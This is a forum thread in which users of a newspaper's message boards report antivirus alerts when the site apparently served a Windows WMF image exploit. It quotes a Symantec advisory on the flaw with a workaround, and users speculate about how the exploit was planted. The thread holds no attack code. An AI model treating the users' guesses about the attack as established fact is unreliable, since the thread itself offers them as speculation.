As soon as I entered the forums, my antivirus warned me of an unauthorized attempt to hack into my computer and a file started downloading, which I quickly cancelled.

So either some spammer put a virus in one of their posts, or the Herald-Mail has added some new feature that attempts to make illicit connections to control our computers and download files without asking for permission first.

If it's the former, then H-M needs to upgrade their antivirus protection on the boards to keep people from posting viruses. If it's the latter, they REALLY need to cut it out!

----

More details. The attack was flagged by Norton as a ...

HTTP MS Windows WMF Code Exec
Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description: This signature detects an attempt to exploit a vulnerability in the Microsoft Windows Metafile (WMF) image format.

Additional Information

Microsoft Windows supports the Windows Metafile (WMF) image format. WMF is a 16-bit image format and contains vector and bitmap information.

The Microsoft Windows WMF graphics rendering engine is affected by a remote code execution vulnerability. The cause of this issue is currently unknown.

The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file.

Any code execution that occurs will be with the privileges of the user viewing a malicious image. An attacker may gain SYSTEM privileges if an administrator views the malicious file.

This issue could be exploited remotely through any means that would allow an attacker to transmit the malicious image to a user, including through a malicious Web site and HTML email, or embedding it in an Office document. Attacks could also occur by enticing the victim to visit a remote file share hosting the file. User interaction is required in remote attack scenarios.

A local attacker could also exploit this issue to gain elevated privileges without any user interaction. It is noted that any application that is used to view the affected image type may present an attack vector.

It should be noted that viewing a malicious file in Windows Explorer may automatically trigger this issue.

Due to a lack of details, further information is not available at the moment. This BID will be updated when more information becomes available.

Affected:
...

Response

Workaround:

This vulnerability can be exploited when the Microsoft Windows Picture and Fax Viewer application opens a malicious file. It has been reported that the Microsoft Windows Picture and Fax Viewer application may be disabled by deregistering 'shimgvw.dll' by carrying out the following steps:

Start > Run > regsvr32 /u shimgvw.dll

The following registry entry may also be used to disable the application:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\ShellEx\ContextMenuHandlers\ShellImagePreview]
@=""

It should be noted that the workaround described above has not been verified or tested by Symantec.

Solution:

Currently there are no known patches or workarounds for this vulnerability. It is recommended that users upgrade to the latest version of the application and contact the vendor for more details.

Possible False Positives

There are no known false positives associated with this signature.

Whatever it is, it eventually managed to get past my antivirus and downloaded a virus, Hacktool.IE.Exploit, to my PC. Norton Antivirus found and deleted it, but this is BAD, people!

Try using firefox and disable java, It asked me me before opening the file what I wanted to use which I refused the file. IE will open the file automatically as I found out.

That seems to have done the trick. Thanks!

P.S. - I hope they're able to track down the source of this - and prosecute the bejeebers outta the scumbag!

It's probably payback for the dozen or so asshat spammers I've banned.

No doubt.

Is it safe yet? Can I allow scripts on here now?

Nope, I'm still getting the virus warnings.

When exactly are you getting these warnings? When you get to the forum home page? A particular message?

When I first open the forums and also when i go to another topic. My firefox is warning me and Avast anti-vir is warning me.

I was getting them as soon as the main page loaded. Then after my virus blocker cleaned and deleted it I was fine until I was in the Mail Call to a certain thread posted by someone with the handle Lusis Backwoods Jr. Then I got the pop-up again and it was cleaned and deleted. That's when I went ahead and down loaded Firefox.

totally lame.
the xpl.wmf is classic wmf exploit. it appears to be appended to the header tpl file or the header php file. you can see it in FF at the top, appears as a black dot in the center of the header.
OR, it has messed up a 'shout box' if there was one here.

herald mail should remove this website until they fix it.

you catch this thing when you have either a: a properly mis-configured apache server, or b: incorrect permissions on directories/files allowing uploading of files (i.e. a photo gallery)

So, the question is, who didn't get a norton popup? You are the people who are in trouble, and you have the HM to thank ha ha.

I am not seeing any warnings. I am running FF on 2 machines and McAfee AV on one and Norton Corporate AV on the other.

so glad you're here to help.......ha ha.

Norton has alerted me 3 times today. Luckily it cleaned everything.

Firefox must be blocking it for me. I still see no warnings.

I think this is resolved. If anyone still has issues, please email me immediately, or have Yoss call me!

Thanks...I missed you all!

webbie

Thank You, Webbie

Three Cheers for Webbie!!!

Hip-Hip-Hooray!
Hip-Hip-Hooray!
Hip-Hip-Hooray!

my computer said i had a trojan, started downloading something , but its running ok now.

::adding pasty to my list of computer gods for future reference::

Webbie,

Any chance you caught who did this? I had $20 on Rowdy until someone told me he still needs help getting to his email

I think it was one of those spammers

Starting a new pool. how long wil the site stay up? I've got 4 days

you so bad. *head shaking smilie*

I keep trying to shout in the search box.

And nobody but Phluux has an avatar so I actually have to read names of posters. So lazy...

I've been using "The Back Page" as the shout box.

Heather's avatar =

Thanks so much webbie! You have been busy - it must've been a doozy to take so long fixing it. Glad to see you did though! THANK YOU for the hard work!

anyone know what went wrong? like i said , mine said i had 2 trojans, but now things work great.

Well my antivirus reported an intrusion attempt that takes advantage of a vulnerability that has to do with how Windows manages images. Then it showed some kind of script working that at least once led to my image viewer opening, but I couldn't see whatever picture had been forcibly downloaded. Then my antivirus detected a virus called "Hacktool" which I would assume from the name gives people the ability to hack into and take over your computer by opening a back door - an unauthorized port. As far as I can tell the hacker never quite got past all of the protections since my antivirus program immediately detected and deleted the Hacktool program, at which point I dowloaded and installed Firefox and turned off scripts before returning, but it was a very close call.

So what I suspect happened, was that a hacker somehow posted an image - which must've been in the shoutbox since it started as soon as I connected to the main forum listing - containing code for a script that automatically downloaded a hacking program that would open a port allowing the hacker to connect to and take over any of our computers - without our awareness, if we didn't have proper antivirus protections in place. However, from the notices I read, I think the virus that was downloaded has been known for several years so the only people whom it should have worked against would be those who either don't have antivirus or haven't updated their virus definitions for years. So in the end it wasn't a very successful attack, unless there were other viruses downloaded that my totally updated antivirus somehow missed, which isn't likely because it's totally up-to-date. It does bother me that Norton Personal Firewall only blocked that script the first time and eventually let it download a virus, however. I had just updated that firewall program to the latest version a couple of weeks ago.

Thought I'd pass this along; we've been having all kinds of security training sessions at work

Viruses and worms are related classes of malicious code. Both share the primary objective of replication. However, they are distinctly different with respect to the techniques they use and their host system requirements. This distinction is due to the disjoint sets of host systems they attack. Viruses have been almost exclusively restricted to personal computers, while worms have attacked only multi-user systems.

• Trojan Horse - a program which performs a useful function, but also performs an unexpected action as well.
• Virus - a code segment which replicates by attaching copies to existing executables.
• Worm - a program which replicates itself and causes execution of the new copy.
• Network Worm - a worm which copies itself to another system by using common network facilities, and causes execution of the copy on that system.

i think it had something to do with this forum, there was a lot of stuff going on , and then this forum went down for repairs, mine came as a trojan, it was trying to downloadon my computer, what a mess,

Haditha was good news? ... oh yeah, I guess it was - to terrorist sympathizers!

The particular exploit used seems to have hit all sorts of forums using Invision Power Boards or vbulletin systems in recent months. It was allegedly fixed by a Microsoft Security update issued back in April 2006, but I get automatic security updates and my system wasn't perfectly protected, if at all.

I bet he was wishing that we would've voted that way last election, then he might not have been laying on that stretcher.